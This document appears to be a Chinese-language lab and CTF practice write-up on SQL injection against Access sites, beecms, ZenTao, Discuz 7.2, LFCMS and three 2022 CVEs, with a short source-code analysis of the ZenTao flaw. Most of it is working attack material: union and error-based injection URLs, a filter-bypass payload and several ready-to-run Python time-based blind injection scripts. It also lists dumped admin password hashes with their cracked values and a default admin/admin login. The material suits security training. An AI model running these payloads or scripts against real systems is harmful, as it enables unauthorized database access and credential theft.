1.Access注入
http://110.40.154.212:8002/Production/PRODUCT_DETAIL.asp?id=1513 and exists(select count(*) from admin) #存在admin表,继续爆,还存在job,email,product等
http://110.40.154.212:8002/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select password from admin) #以此类推,存在id,password,admin
http://110.40.154.212:8002/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 #字段数为22
http://110.40.154.212:8002/Production/PRODUCT_DETAIL.asp?id=1513 union select top 1 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,admin.* from admin #admin表有6个字段,3,9,13,15回显
http://110.40.154.212:8002/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10, * from (admin q inner join admin w on q.id=w.id) #利用admin表内联,6*2,补充10个字段数,17后面的admin数据往前移动6位
http://110.40.154.212:8002/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,q.password,* from (admin q inner join admin w on q.id=w.id) #admin
最终admin表大概就为
可以确定admin的表大概为
| id | admin | password | 未知 | 未知 | 未知 |
|---|---|---|---|---|---|
| 39 | admin | a48e190fafc257d3=>bendss | 250 | 2013/12/5 19:34:46 |
用sqlmap跑一下
| id | admin | password | login_count | 未知 | data |
|---|---|---|---|---|---|
| 39 | admin | a48e190fafc257d3=>bendss | 250 | 2013/12/5 19:34:46 | 空 |
二、某某搬家公司
http://110.40.154.212:8003/common.asp?id=2 and 1=1 # 存在注入
http://110.40.154.212:8003/common.asp?id=2 order by 4 #字段数4
http://110.40.154.212:8003/common.asp?id=2 and exists(select * from MSysAccessObjects) #access数据库
http://110.40.154.212:8003/common.asp?id=2 and exists(select *from table_name) #直接字典爆表名 menu,news,admin_user,ad,admin_user
http://110.40.154.212:8003/common.asp?id=2 union select 1,2,3,4 from admin_user #2,3回显
http://110.40.154.212:8003/common.asp?id=2 and exists (select id from admin_user) #id,admin,data,password,
http://110.40.154.212:8003/common.asp?id=2 union select 1,id,password,4 from admin_user # admin 21232f297a57a5a743894a0e4a801fc3=>admin
3、手工注入练习
一样,跟上面用的应该是同一个Access数据库。
4、Cookie注入
1 and exists(select *from admin) 存在admin user product user news book
1 and exists(select password from admin) #id,data,username,password,
1 order by 12 #字段数是11
1 union select 1,2,3,4,5,6,7,8,9,10,11 from admin #2,3号位显示
1 union select 1,username,password,4,5,6,7,8,9,10,11 from admin
5、beecms注入
admin' a and nd updatexml(1,concat(0x7e,(select database()),0x7e),1)#
admin' a and nd updatexml(1,concat(0x7e,(selselectect group_concat(table_name) fr from om information_schema.tables wh where ere table_schema like database()),0x7e),1)# //bees_admin,bees_admin_group,bee
admin' a and nd updatexml(1,concat(0x7e,(selselectect group_concat(column_name) fr from om information_schema.columns wh where ere table_schema like database()),0x7e),1)# //id,admin_name,admin_password,ad
admin' a and nd updatexml(1,concat(0x7e,(selselectect group_concat(admin_name,admin_password) fr from om bees.bees_admin ),0x7e),1)#
尝试写shell没成功,可能是prev没开。
七、禅道sql注入
class block extends control
{
public function __construct($moduleName = '', $methodName = '')
{
parent::__construct($moduleName, $methodName);
$this->selfCall = strpos($this->server->http_referer, common::getSysURL()) === 0 || $this->session->blockModule;
if($this->methodName != 'admin' and $this->methodName != 'dashboard' and !$this->selfCall and !$this->loadModel('sso')->checkKey()) die('');
}
public function main($module = '', $id = 0)
{
$mode = strtolower($this->get->mode);
if($mode == 'getblocklist')
{
}
elseif($mode == 'getblockdata')
{
$code = strtolower($this->get->blockid);
$params = $this->get->param;
$params = json_decode(base64_decode($params));
$this->viewType = (isset($params->viewType) and $params->viewType == 'json') ? 'json' : 'html';
$this->params = $params;
$this->view->code = $this->get->blockid;
$func = 'print' . ucfirst($code) . 'Block';
if(method_exists('block', $func))
{
$this->$func($module);
}
else
{
$this->view->data = $this->block->$func($module, $params);
}
}
}
先对Referer进行了判断,如果不正确,直接die(),通过判断mode=getblockdata进入分支,传入blockid=case调用进入printcaseBlock
()函数
public function printCaseBlock()
{
if($this->params->type == 'assigntome')
{
}
elseif($this->params->type == 'openedbyme')
{
$cases = $this->dao->findByOpenedBy($this->app->user->account)->from(TABLE_CASE)
->andWhere('deleted')->eq(0)
->orderBy($this->params->orderBy)
->beginIF($this->viewType != 'json')->limit($this->params->num)->fi()
->fetchAll();
}
$this->view->cases = $cases;
}
判断params中的type值,传openedbyme从而进入orderBy()漏洞函数。
public function orderBy($order)
{
if($this->inCondition and !$this->conditionIsTrue) return $this;
$order = str_replace(array('|', '', '_'), ' ', $order);
$pos = stripos($order, 'limit');
$orders = $pos ? substr($order, 0, $pos) : $order;
$limit = $pos ? substr($order, $pos) : '';
$orders = trim($orders);
if(empty($orders)) return $this;
if(!preg_match('/^(\w+\.)?(`\w+`|\w+)( +(desc|asc))?( *(, *(\w+\.)?(`\w+`|\w+)( +(desc|asc))?)?)*$/i', $orders)) die("Order is bad request, The order is $orders");
$orders = explode(',', $orders);
foreach($orders as $i => $order)
{
$orderParse = explode(' ', trim($order));
foreach($orderParse as $key => $value)
{
$value = trim($value);
if(empty($value) or strtolower($value) == 'desc' or strtolower($value) == 'asc') continue;
$field = $value;
/* such as t1.id field. */
if(strpos($value, '.') !== false) list($table, $field) = explode('.', $field);
if(strpos($field, '`') === false) $field = "`$field`";
$orderParse[$key] = isset($table) ? $table . '.' . $field : $field;
unset($table);
}
$orders[$i] = join(' ', $orderParse);
if(empty($orders[$i])) unset($orders[$i]);
}
$order = join(',', $orders) . ' ' . $limit;
$this->sql .= ' ' . DAO::ORDERBY . " $order";
return $this;
}
先将order中的|,_置换为空格,然后取第一次出现limit的位置,取值,对orders进行了正则匹配和处理,但是没有对limit进行处理,最后又把limit拼接到了ORDERBY语句中执行,导致了注入产生。
import base64
payload=b"""{"orderBy":"order limit 1;select (if(ascii(substr((select database()),1,1))>0,sleep(5),1))-- ","num":"1,1","type":"openedbyme"}"""
base64encode_str = base64.b64encode(payload)
print(base64encode_str)
执行时间达到5秒多,说明sql语句被执行了。
import base64
import time
import requests
payload=b"""{"orderBy":"order limit 1;select (if(ascii(substr((select database()),1,1))>0,sleep(5),1))-- ","num":"1,1","type":"openedbyme"}"""
headers={
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0',
'Cookie':'lang=zh-cn; theme=default; lastProduct=2; think_template=default; SECKEY_ABVK=sDKUFx0SI2QxP1RGsU9FV8qwP8TB8dsS5s540TBV5ms%3D; BMAP_SECKEY=nYO150H6Wi-DT3mcAEoVLuT4r9CzC0S_Eze5tiiPyKXCUefAwVqUS-S_D0_0HfTtRUfRKLcQj3Zv0etp0wI6U-T73zjNXiLh_qCw8wxeIpYFhypp0iO4bRF5Z3Ybzte2BZQ9s7kcW32CL8iYEboDZNuDwUK6ApljNJr9yVz1spj8X9DACSY7j3raFA27vDw0; ASPSESSIONIDAQDDSBSS=GNHNFOMAHBLKHHMNBFNMEBMK; ASPSESSIONIDCQCCRATT=LBBHAMNAMBAOIMDHBFADKHLM; sid=abi792kma4oc97llvmdegnstt5; windowWidth=692; windowHeight=711; PHPSESSID=p9a6umsf1ajbc3d4tm5k9ge676; Hm_lvt_b60316de6009d5654de7312f772162be=1678363323; Hm_lpvt_b60316de6009d5654de7312f772162be=1678363707; f814212a5b521d45bd53097f6a4a5fdb_ci_session=d25dvapp153pkttr7sp9rrpak9hisg2i; lf_users___forward__=%2Findex.php%3Fs%3D%2Flists%2Findex%2Fid%2F55.html',
'Referer': 'http://110.40.154.212:8081/index.php?m=block&f=main&mode=getblockdata&blockid=case¶m=eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTtzZWxlY3QgKGlmKGFzY2lpKHN1YnN0cigoc2VsZWN0IGRhdGFiYXNlKCkpLDEsMSkpPjY0LHNsZWVwKDUpLDEpKS0tICIsIm51bSI6IjEsMSIsInR5cGUiOiJvcGVuZWRieW1lIn0='
}
result = ''
for times in range(1, 88):
min = 0
max = 128
mid = (min + max) // 2
while min < max:
payload = '{'+f'"orderBy":"order limit 1;select (if(ascii(substr((select database()),{times},1))>{mid},sleep(5),1))-- ","num":"1,1","type":"openedbyme"' +'}'
base64encode_str = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
url="http://110.40.154.212:8081/index.php?m=block&f=main&mode=getblockdata&blockid=case¶m="+base64encode_str
startTime = time.time()
resp = requests.get(url,headers=headers)
if time.time()-startTime > 3:
min = mid + 1
else:
max = mid
mid = (min + max) // 2
result += chr(min)
print(result)
八、Discuz7.2
function implodeids($array) {
if(!empty($array)) {
return "'".implode("','", is_array($array) ? $array : array($array))."'";
} else {
return '';
}
}
漏洞成因是impledeids将$groupids数组用,分隔开,组成了类似于’1’,‘2’,‘3’,‘4’,这样的字符返回,刚取出第一个转义符,会将正常的’转义,编程’1’,‘’,‘3’,‘4’,从而导致第三个引号和第五个引号闭合成功,3成功逃逸。
payload如下:
import re
import requests
s=requests.session()
headers={
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0'
}
url="http://110.40.154.212:8041/faq.php?action=grouppermission&gids[9]=%27&gids[10][0]="
#payload=") and updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+"
payload=")%20and%20updatexml(1,concat(0x7e,(select%20table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e),1)--+"
url=url+payload
resp=s.get(url,headers=headers)
obj=re.compile(r'.*?XPATH syntax error: (?P<name>.*?)<br />.*?')
result3 = obj.search(resp.text)
print(result3.group("name"))
九、Poscms
弱口令 admin admin
十、LFCMS
import time
import requests
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0',
'Cookie': 'lang=zh-cn; theme=default; lastProduct=2; think_template=default; SECKEY_ABVK=r765x/a4GpSgTpZWaXpRMHGkAr7A4jYs9j+/yYIFI7Y%3D; BMAP_SECKEY=Z87tl5vu1Tck9__fh5HGqx6jV4LMqg2iVrfDcWFYuWoF3KRhPMPWQDJK0UN3Rb_WfQH6WOFCQ58HM_bVAAO1ybF4klLwASuNrZ58kxks8KcFKBrZLKog6RbpZMwnRPdf0gPtuf_jkc3L4IfZPBOFxulTgRykV0wGZViV3ogirrqFatnGW5Kbam1L3iZgBr6b; Hm_lvt_b60316de6009d5654de7312f772162be=1678712949,1678717766,1678718983,1678720108; Py1_sid=moGWFy; Py1_visitedfid=2; f814212a5b521d45bd53097f6a4a5fdb_ci_session=qphormh4vscqqohbil540na3eqmijksd; member_uid=1; member_cookie=8f85827484437f675f15; finecms-admin-login=admin; PHPSESSID=kgaha0hgok2fobjk7ic4pb0292; lf_users___forward__=%2Findex.php%3Fs%3D%2Flists%2Findex%2Fid%2F4.html'
}
flag = ''
for times in range(1, 10):
count = 1
for j in range(1,130):
url = f'http://110.40.154.212:8070/index.php/Ajax/randMovie?limit=1&category=1%20AND%20(SELECT%208586%20FROM%20(SELECT(if(STRCMP({count},ORD(MID((SELECT%20DATABASE()),{times},1))),sleep(5),1)))YVDz)'
#1 AND (SELECT 8586 FROM (SELECT(if(STRCMP(2,ORD(MID((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))),sleep(5),1)))YVDz) 爆表
startTime = time.time()
resp = requests.get(url, headers=headers)
if time.time() - startTime > 3:
count += 1
else:
flag += chr(count)
break
time.sleep(1)
print(flag)
十一、CVE-2022-0760
import requests
import time
# 这里我们直接猜测flag和上一个sql注入的flag位置相同
# flag
# ctftraining.flag
url = "http://43.143.7.97:28646/wp-admin/admin-ajax.php"
flag=''
for i in range(1, 100):
min = 1
max = 130
mid = int((min + max) / 2)
while min < max:
data = {
"action": "qcopd_upvote_action",
"post_id": f"(SELECT 3 FROM (SELECT if(ascii(substr((select group_concat(flag) from ctftraining.flag),{i},1))>{mid}, sleep(2),0))enz)"
}
start_time = time.time()
resp = requests.post(url=url, data=data)
end_time = time.time()
if end_time - start_time >= 1.5:
min = mid + 1
mid = int((min + max) / 2)
else:
max = mid
mid = int((min + max) / 2)
time.sleep(0.05)
flag += chr(mid)
print(flag)
十二、CVE-2022-28060
import requests
url = "http://eci-2zedokw2lk9cmgyzien0.cloudeci1.ichunqiu.com/includes/login.php"
headers = {"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0",
"Cookie": "PHPSESSID=13eujk0h63jengf960ni8f75ib"}
result=''
for times in range(1, 80):
min = 0
max = 128
mid = (min + max) // 2
while min < max:
#payload = f"test' or (ascii(substr((select database()),{times},1))>{mid})#" php_cms
payload = f"test' or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{times},1))>{mid})#" #categories,comments,posts,users
params = {"user_name":payload,"user_password":"test","login":""}
resp = requests.post(url, headers=headers,data=params,allow_redirects=False)
if resp.status_code == 302:
min = mid + 1
else:
max = mid
mid = (min + max) // 2
result += chr(min)
print(result)
十三、CVE-2022-32991
import requests
url="http://eci-2ze7tjyvsp74pucwtvoj.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0%27%20and%20length(database())%3E2%23&n=2&t=10"
headers={"user-agent": "Mozilla/5.0 (Macintosh;)",
"Cookie": "PHPSESSID=s9uv7tno0iv57qj1fde7u1sb64"}
result=''
for times in range(1, 80):
min = 0
max = 128
mid = (min + max) // 2
while min < max:
#url=f"http://eci-2ze7tjyvsp74pucwtvoj.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0' and if((ascii(substr((select database()),{times},1))>{mid}),1,0)%23&n=2&t=10"
#url = f"http://eci-2ze7tjyvsp74pucwtvoj.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0' and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{times},1))>{mid}),1,0)%23&n=2&t=10"
#url = f"http://eci-2ze7tjyvsp74pucwtvoj.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0' and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'),{times},1))>{mid}),1,0)%23&n=2&t=10"
url = f"http://eci-2ze7tjyvsp74pucwtvoj.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0' and if((ascii(substr((select flag from ctf.flag),{times},1))>{mid}),1,0)%23&n=2&t=10"
resp = requests.get(url, headers=headers)
if 'Notice' not in resp.text:
min = mid + 1
else:
max = mid
mid = (min + max) // 2
result += chr(min)
print(result)
![[数据库系统] 二、表的基本操作(educoder)](https://img-blog.csdnimg.cn/7568d60410784dc28103f0281272942d.png)
